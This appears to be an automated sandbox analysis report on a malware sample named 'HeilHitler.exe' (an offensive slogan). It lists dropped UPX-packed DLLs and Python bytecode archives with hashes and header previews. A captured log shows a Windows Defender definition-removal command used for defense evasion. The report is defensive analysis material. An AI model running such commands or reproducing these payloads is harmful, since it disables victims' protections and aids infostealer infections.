                                                                                                                                                                                                                                          Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. N.o.v. .. 1.5. .. 2.0.2.4. .0.4.:.4.4.:.1.8.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. N.o.v. .. 1.5. .. 2.0.2.4. .0.4.:.4.4.:.1.8.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Fri Nov 15 11:10:02 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1372
                                                                                                                                                                                                                                          Entropy (8bit):4.105486008940973
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:HjCFq9UZfPbUDfHkwKefC3XNII+ycuZhNQ7akSj0PNnqS+d:2vBPbSLKCCnu1ul8a3AqSe
                                                                                                                                                                                                                                          MD5:6639F1A7631B456AC13EA9107FE6444C
                                                                                                                                                                                                                                          SHA1:D4CDF453E46CA9CB9BBE0E4975877C98DF9CAB9C
                                                                                                                                                                                                                                          SHA-256:06CCC7A6AD3B53230FBB5179B8916C24A12F6AB577BF8D362C775AD2AC79876A
                                                                                                                                                                                                                                          SHA-512:4585046CA97D6801BB8CA31E95168A6BAD99488E7615E32F6CB6FA931C6267A7CC4A9D68B15AFD9127C343CBA1F71FDF0B7549CC2B69A97D99137AF5C8F5E898
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):109392
                                                                                                                                                                                                                                          Entropy (8bit):6.643764685776923
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:DcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/Auecbq8qZU34zW/K0zD:DV3iC0h9q4v6XjKAuecbq8qGISb/
                                                                                                                                                                                                                                          MD5:870FEA4E961E2FBD00110D3783E529BE
                                                                                                                                                                                                                                          SHA1:A948E65C6F73D7DA4FFDE4E8533C098A00CC7311
                                                                                                                                                                                                                                          SHA-256:76FDB83FDE238226B5BEBAF3392EE562E2CB7CA8D3EF75983BF5F9D6C7119644
                                                                                                                                                                                                                                          SHA-512:0B636A3CDEFA343EB4CB228B391BB657B5B4C20DF62889CD1BE44C7BEE94FFAD6EC82DC4DB79949EDEF576BFF57867E0D084E0A597BF7BF5C8E4ED1268477E88
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                          • Filename: meN9qeS2DE.exe, Detection: malicious
                                                                                                                                                                                                                                          • Filename: client1.exe, Detection: malicious
                                                                                                                                                                                                                                          • Filename: qbE2mhhzCq.exe, Detection: malicious
                                                                                                                                                                                                                                          • Filename: UwOcZADSmi.exe, Detection: malicious
                                                                                                                                                                                                                                          • Filename: IyWKJMlCXg.exe, Detection: malicious
                                                                                                                                                                                                                                          • Filename: SecuriteInfo.com.Python.Stealer.1545.20368.28754.exe, Detection: malicious
                                                                                                                                                                                                                                          • Filename: JdHvcxG4Up.exe, Detection: malicious
                                                                                                                                                                                                                                          • Filename: souFnS89FP.exe, Detection: malicious
                                                                                                                                                                                                                                          • Filename: Bootstrapper V1.19.exe, Detection: malicious
                                                                                                                                                                                                                                          • Filename: enigma.tech.exe, Detection: malicious
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):47992
                                                                                                                                                                                                                                          Entropy (8bit):7.809914406923306
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:RiQxyc/3D2HGItfsKbsonbgiHUoYbcp87I7tVbeiYiSyv5PxWEDX:R5xdEsKbtnbgqUoYb7I7tVbh7SyxPx9
                                                                                                                                                                                                                                          MD5:93FE6D3A67B46370565DB12A9969D776
                                                                                                                                                                                                                                          SHA1:FF520DF8C24ED8AA6567DD0141EF65C4EA00903B
                                                                                                                                                                                                                                          SHA-256:92EC61CA9AC5742E0848A6BBB9B6B4CDA8E039E12AB0F17FB9342D082DDE471B
                                                                                                                                                                                                                                          SHA-512:5C91B56198A8295086C61B4F4E9F16900A7EC43CA4B84E793BC8A3FC8676048CAB576E936515BF2971318C7847F1314674B3336FE83B1734F9F70D09615519AC
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):58232
                                                                                                                                                                                                                                          Entropy (8bit):7.819692209624967
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:/UP3/jolpinLX2rRaWMzhBuW9I7QP7h7SykPxiM:I3/jolwXuRaW6wUI7QP7h2xB
                                                                                                                                                                                                                                          MD5:813FC3981CAE89A4F93BF7336D3DC5EF
                                                                                                                                                                                                                                          SHA1:DAFF28BCD155A84E55D2603BE07CA57E3934A0DE
                                                                                                                                                                                                                                          SHA-256:4AC7FB7B354069E71EBF7FCC193C0F99AF559010A0AD82A03B49A92DEB0F4D06
                                                                                                                                                                                                                                          SHA-512:CE93F21B315D96FDE96517A7E13F66AA840D4AD1C6E69E68389E235E43581AD543095582EBCB9D2C6DDA11C17851B88F5B1ED1D59D354578FE27E7299BBEA1CC
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):106368
                                                                                                                                                                                                                                          Entropy (8bit):7.93479712134
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:ugCMV2Mz94bMgxECS8kePpTn8jI75qNp6mx:u1MV2Mz94og2tJePpwpp
                                                                                                                                                                                                                                          MD5:F65D2FED5417FEB5FA8C48F106E6CAF7
                                                                                                                                                                                                                                          SHA1:9260B1535BB811183C9789C23DDD684A9425FFAA
                                                                                                                                                                                                                                          SHA-256:574FE8E01054A5BA07950E41F37E9CF0AEA753F20FE1A31F58E19202D1F641D8
                                                                                                                                                                                                                                          SHA-512:030502FA4895E0D82C8CCE00E78831FC3B2E6D956C8CC3B9FB5E50CB23EF07CD6942949A9F16D02DA6908523D9D4EF5F722FB1336D4A80CD944C9F0CB11239AB
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):34176
                                                                                                                                                                                                                                          Entropy (8bit):7.670946753848895
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:aq3dM1TMhvg8KNML5TOuzSsI/LpazI75ImyYiSyvfPxWEabVV/:aEdM1TMho8iMLPmv/AzI75Imy7SyXPxA
                                                                                                                                                                                                                                          MD5:4AE75C47DBDEBAA16A596F31B27ABD9E
                                                                                                                                                                                                                                          SHA1:A11F963139C715921DEDD24BC957AB6D14788C34
                                                                                                                                                                                                                                          SHA-256:2308EE238CC849B1110018B211B149D607BF447F4E4C1E61449049EAB0CF513D
                                                                                                                                                                                                                                          SHA-512:E908FECB52268FAC71933E2FDB96E539BDEBE4675DFB50065AEE26727BAC53E07CCA862193BCB3AB72D2AE62D660113A47E73E1E16DB401480E4D3FD34D54FA8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):86392
                                                                                                                                                                                                                                          Entropy (8bit):7.91766123352546
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:EfKvmqFMCNL6eKmtYs76LBlBqLBxcZiV6IHxdc/k4Nc+VI7e1gf7SyJPxs:4qdLCOz76LBl4VxYcdc/11I7e1gfvxs
                                                                                                                                                                                                                                          MD5:6F810F46F308F7C6CCDDCA45D8F50039
                                                                                                                                                                                                                                          SHA1:6EE24FF6D1C95BA67E1275BB82B9D539A7F56CEA
                                                                                                                                                                                                                                          SHA-256:39497259B87038E86C53E7A39A0B5BBBFCEBE00B2F045A148041300B31F33B76
                                                                                                                                                                                                                                          SHA-512:C692367A26415016E05EBE828309D3FFEC290C6D2FD8CC7419D529A51B0BEDA00CCDC327C9F187AE3CA0CC96336D23D84A8FF95B729C8958B14FB91B6DA9E878
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.J[&.$.&.$.&.$./..".$.i.%.$.$.i.!.*.$.i. ...$.i.'.%.$...%.%.$...%.$.$.&.%.C.$...)...$...$.'.$.....'.$...&.'.$.Rich&.$.........PE..d...B..c.........." ...". ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):24960
                                                                                                                                                                                                                                          Entropy (8bit):7.447047314489284
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:BSxw19p9opxfI77U2bYiSyvlfUvPxWEl:Bj1HgfI77U2b7SyOvPx
                                                                                                                                                                                                                                          MD5:0E7612FC1A1FAD5A829D4E25CFA87C4F
                                                                                                                                                                                                                                          SHA1:3DB2D6274CE3DBE3DBB00D799963DF8C3046A1D6
                                                                                                                                                                                                                                          SHA-256:9F6965EB89BBF60DF0C51EF0750BBD0655675110D6C42ECA0274D109BD9F18A8
                                                                                                                                                                                                                                          SHA-512:52C57996385B9A573E3105EFA09FD6FD24561589B032EF2B2EE60A717F4B33713C35989F2265669F980646D673E3C387B30B9FC98033BB8CA7C59ECE1C17E517
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._ZF.1.F.1.F.1.O..D.1...0.D.1...4.J.1...5.N.1...2.E.1...0.E.1...0.D.1.F.0...1...<.G.1...1.G.1.....G.1...3.G.1.RichF.1.........PE..d...&..c.........." ...".0..........`.....................................................`.............................................L.......P............`..............<.......................................`...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):42880
                                                                                                                                                                                                                                          Entropy (8bit):7.696654190779553
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:oL7Syo5lzOt+ufVwPVXahccu0D+gFiPnmJqpE2SI7QwbmGYiSyvb9ZPxWEl:IkbzcKNGu0yXwN2SI7QwbmG7Syj/Px
                                                                                                                                                                                                                                          MD5:7A31BC84C0385590E5A01C4CBE3865C3
                                                                                                                                                                                                                                          SHA1:77C4121ABE6E134660575D9015308E4B76C69D7C
                                                                                                                                                                                                                                          SHA-256:5614017765322B81CC57D841B3A63CBDC88678FF605E5D4C8FDBBF8F0AC00F36
                                                                                                                                                                                                                                          SHA-512:B80CD51E395A3CE6F345B69243D8FC6C46E2E3828BD0A7E63673A508D889A9905D562CAC29F1ED394CCFCDA72F2F2E22F675963DD96261C19683B06DEA0A0882
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z..{4..{4..{4......{4...5..{4...1..{4...0..{4...7..{4.U.5..{4..{5.\{4.9.5..{4.U.9..{4.U.4..{4.U....{4.U.6..{4.Rich.{4.........................PE..d...0..c.........." ...".p..........0m....................................................`.............................................P.......h............ ..l...........X.......................................@y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):50048
                                                                                                                                                                                                                                          Entropy (8bit):7.761194500415829
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:c8Mdv1OCWk0z+q3QCjbouWxI75Qr27SyDPx:vQO00zrrvbQI75Qr2Nx
                                                                                                                                                                                                                                          MD5:BB4AA2D11444900C549E201EB1A4CDD6
                                                                                                                                                                                                                                          SHA1:CA3BB6FC64D66DEADDD804038EA98002D254C50E
                                                                                                                                                                                                                                          SHA-256:F44D80AB16C27CA65DA23AE5FDA17EB842065F3E956F10126322B2EA3ECDF43F
                                                                                                                                                                                                                                          SHA-512:CD3C5704E5D99980109FDC505D39AD5B26A951685E9D8E3FED9E0848CD44E24CC4611669DBDB58ACC20F1F4A5C37D5E01D9D965CF6FE74F94DA1B29AA2FF6931
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8..|...|...|...u...z...3...~...3.~.}...3...q...3...t...3..........y.......~...|..........u......}....|.}......}...Rich|...........PE..d...[..c.........." ...".........@..0....P................................................`.............................................P.......4............`..............(.......................................0...@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):62328
                                                                                                                                                                                                                                          Entropy (8bit):7.84875298158187
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:0edJItp3BP6kGsJMthwMtbyG68yTyI7t7QO67SycPxu:h8tVBPpGsUt+uyuI7t7Q/+xu
                                                                                                                                                                                                                                          MD5:081C878324505D643A70EFCC5A80A371
                                                                                                                                                                                                                                          SHA1:8BEF8336476D8B7C5C9EF71D7B7DB4100DE32348
                                                                                                                                                                                                                                          SHA-256:FCB70B58F94F5B0F9D027999CCE25E99DDCC8124E4DDCC521CB5B96A52FAAA66
                                                                                                                                                                                                                                          SHA-512:C36293B968A2F83705815EF3A207E444EEB7667AD9AF61DF75E85151F74F2FE0A299B3B1349DE0D410BBBAEA9F99CAC5228189099A221DE5FA1E20C97C648E32
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,z..h.gLh.gLh.gLac.Ln.gL'gfMj.gL'gbMe.gL'gcM`.gL'gdMk.gL.gfMj.gL.afMl.gLh.fL..gL.ifMo.gL.gjMj.gL.ggMi.gL.g.Li.gL.geMi.gLRichh.gL................PE..d...3..c.........." ..."............ .....................................................`.........................................p...d....................P......................................................0...@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):880537
                                                                                                                                                                                                                                          Entropy (8bit):5.683040803121861
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:cgYJu4KXWyBC6S4IEa8A4a2Y42dOVwx/fpEWertSLMN6:cgYJiVBFLa21nVwx/fpEWe+MN6
                                                                                                                                                                                                                                          MD5:EE93CE2F8261BA7510F041619BB2B6F2
                                                                                                                                                                                                                                          SHA1:F1D5D2F4C0B10E862B4B0A5EA65C47645901F894
                                                                                                                                                                                                                                          SHA-256:41CE839465CF935B821CAFC3A98AFE1C411BF4655AD596442EB66D140CCD502E
                                                                                                                                                                                                                                          SHA-512:C410A0B9EB43B2D0B190F453EA3907CDC70BFCF190ECF80FB03ED906AF381853153270FD824FE2E2BA703BCEED79E973F330D5EC31DFABFF0F5A9F0F162136E9
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:PK..........!..,..5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF
Process:C:\Users\user\Desktop\HeilHitler.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):77542
Entropy (8bit):7.862361739674102
Encrypted:false
SSDEEP:1536:8a/2kfLrA1tdHZHWi4lO+GKlMEkQlA1SNygQSl8If6wuzD1y:8aekTr0tlZHGGOMLQlUSFzBCo
MD5:FFBA2483AA5DBAAA4D591EFC76B77D16
SHA1:E30DB1BC1DA9D2B54555B73C7FD827B1DBF70C91
SHA-256:85F6097B65200F235C735713C1E73D91915562EAE4D5E22C44EA509B5385EA78
SHA-512:69E108AD6222992821B7B5E869E1EB49AD2366BE18EE40DFB0F4A1A1EE39F533FECD9BF18B3051466AD00ADB0CEE2F1F31D62AB9E675B7087BE01E3F2C31435D
Malicious:false
Preview:PK........R.bY.w.p...p.......stub-o.pyco.......-.&g.........................@...sl...e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.d.d...Z.d.Z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e...Z.z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e...........pie.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............d.....W.nA..e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d...............y.......Y.n.w.G.d.d...d...Z.d.S.)....b....a....s....e....6....4.....r.
Process:C:\Users\user\Desktop\HeilHitler.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1189728
Entropy (8bit):7.945107908450931
Encrypted:false
SSDEEP:24576:jffQrZJIe6/4gho5HE1F03fkOyUU/BtSIgA0ft+rBFOWRIQ6sCY51CPwDv3uFfJv:Tf8JWwgho5HL3fknPSIKorCU1CPwDv3a
MD5:DAA2EED9DCEAFAEF826557FF8A754204
SHA1:27D668AF7015843104AA5C20EC6BBD30F673E901
SHA-256:4DAB915333D42F071FE466DF5578FD98F38F9E0EFA6D9355E9B4445FFA1CA914
SHA-512:7044715550B7098277A015219688C7E7A481A60E4D29F5F6558B10C7AC29195C6D5377DC234DA57D9DEF0C217BB3D7FECA332A64D632CA105503849F15E057EA
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... .........@%.025..P%..................................P7...........`......................................... H5......C5.h....@5......`2.............H7......................................=5.@...........................................UPX0.....@%.............................UPX1.........P%.....................@....rsrc........@5.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\HeilHitler.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):24088
Entropy (8bit):7.527291720504194
Encrypted:false
SSDEEP:384:hRZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:rwlGuUm2Evb1p07pWDG4yKRF
MD5:6F818913FAFE8E4DF7FEDC46131F201F
SHA1:BBB7BA3EDBD4783F7F973D97B0B568CC69CADAC5
SHA-256:3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
SHA-512:5473FE57DC40AF44EDB4F8A7EFD68C512784649D51B2045D570C7E49399990285B59CFA6BCD25EF1316E0A073EA2A89FE46BE3BFC33F05E3333037A1FD3A6639
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\HeilHitler.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):208224
Entropy (8bit):7.9214932539909775
Encrypted:false
SSDEEP:3072:5SI3oPlWLlPVVc5MpJa1pOjJnnioIZW8/Qf6bRXGKrs8qJjueW1LR/oSB6hetz:EIek5VC0FiHof6Z1rgJ63R/oS3
MD5:EAC369B3FDE5C6E8955BD0B8E31D0830
SHA1:4BF77158C18FE3A290E44ABD2AC1834675DE66B4
SHA-256:60771FB23EE37B4414D364E6477490324F142A907308A691F3DD88DC25E38D6C
SHA-512:C51F05D26FDA5E995FE6763877D4FCDB89CD92EF2D6EE997E49CC1EE7A77146669D26EC00AD76F940EF55ADAE82921DEDE42E55F51BD10D1283ECFE7C5009778
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .....P...`..@....p................................................`..........................................6..4@...3.......0...........M...........v......................................@%..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\HeilHitler.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1513336
Entropy (8bit):7.991995760990047
Encrypted:true
SSDEEP:24576:Umhx0O5yMVUEV51zVZ/7KqaI0jVSn/OCNYLfUehwHqDdt9OJzoCr2TAY/f+TNX59:UmT0OjUK51xZ/7s6GDwKDD9OJEwsAE2V
MD5:178A0F45FDE7DB40C238F1340A0C0EC0
SHA1:DCD2D3D14E06DA3E8D7DC91A69B5FD785768B5FE
SHA-256:9FCB5AD15BD33DD72122A171A5D950E8E47CEDA09372F25DF828010CDE24B8ED
SHA-512:4B790046787E57B9414A796838A026B1530F497A75C8E62D62B56F8C16A0CBEDBEFAD3D4BE957BC18379F64374D8D3BF62D3C64B53476C7C5005A7355ACD2CEE
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R..R..R...S..R......R...W..R...V..R...Q..R.....R.K.S..R..S..R.'._.X.R.'.R..R.'....R.'.P..R.Rich..R.........PE..d......c.........." ...". ......../...E.../...................................F...........`...........................................F.......F.d.....F.......B...............F.......................................E.@...........................................UPX0....../.............................UPX1..... ..../.....................@....rsrc.........F.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\HeilHitler.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):630736
Entropy (8bit):6.409476333013752
Encrypted:false
SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:9C223575AE5B9544BC3D69AC6364F75E
SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
